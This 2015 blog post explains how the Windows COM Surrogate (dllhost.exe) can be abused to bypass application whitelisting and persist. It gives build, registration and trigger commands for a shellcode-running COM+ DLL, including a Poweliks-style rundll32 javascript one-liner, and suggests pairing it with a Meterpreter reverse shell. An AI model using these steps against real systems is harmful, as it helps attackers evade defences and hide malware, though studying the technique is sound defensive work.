Thursday, August 27, 2015

Hiding In Plain Sight - COM Surrogate Application Whitelisting Bypass & Persistence


What exactly are all those Dllhost.exe processes and What are they doing?

Best description I have found to describe what is happening here:

"The dllhost.exe process goes by the name COM Surrogate ... What is this COM Surrogate...?
The COM Surrogate is a fancy name for Sacrificial process for a COM object that is run outside of the process that requested it. Explorer uses the COM Surrogate when extracting thumbnails, for example. If you go to a folder with thumbnails enabled, Explorer will fire off a COM Surrogate and use it to compute the thumbnails for the documents in the folder. It does this because Explorer has learned not to trust thumbnail extractors; they have a poor track record for stability. Explorer has decided to absorb the performance penalty in exchange for the improved reliability resulting in moving these dodgy bits of code out of the main Explorer process. When the thumbnail extractor crashes, the crash destroys the COM Surrogate process instead of Explorer.
In other words, the COM Surrogate is the I don't feel good about this code, so I'm going to ask COM to host it in another process. That way, if it crashes, it's the COM Surrogate sacrificial process that crashes instead of me process. And when it crashes, it just means that Explorer's worst fears were realized."

Again, Dllhost is a trusted signed binary that executes other binaries.  So, it is a candidate for Whitelisting bypass. With the added bonus of being a persistence mechanism.

I wrote a Proof Of Concept here: [Updated]

Basically, this is just going to execute some shell code once we register the COM+ Application.

1: [.NET SDK]     sn.exe key.snk 

2:  C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /keyfile:key.snk /target:library /out:dllguest.dll dllguest.cs

3: [As Administrator]     C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe dllguest.dll

4: [From PowerShell]     $b = New-Object -ComObject dllguest.bypass
    [From VBScript]         Dim obj
                                         Set obj = CreateObject("dllguest.Bypass")
5. [Jscript]
                                       var o = new ActiveXObject("dllguest.Bypass");

6. [Poweliks Like]
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=new%20ActiveXObject("dllguest.Bypass");

Here is one place you can find the registered COM service:

It does require Admin rights to install the COM+ Application. And all this example does is execute shellcode. Feel free to explore other aspects of COM Surrogate persistence. There is quite a bit more here.

When was the last time you checked your workstation for a COM+ Application.  Further more, if the target system is running a tool like Sysmon

They will see TONS of entries for dllhost.exe.  They look like this:

So there you go.  Blend in with the noise, bypass all the things.  Camouflage is a way for hunters to blend in with the terrain.  Dllhost.exe certainly helps you blend in with the system noise.

This works brilliantly with a Meterpreter Reverse Shell.

So there you go.  Until next time



1 comment:

  1. Nice blog and very informative thank you for sharing us.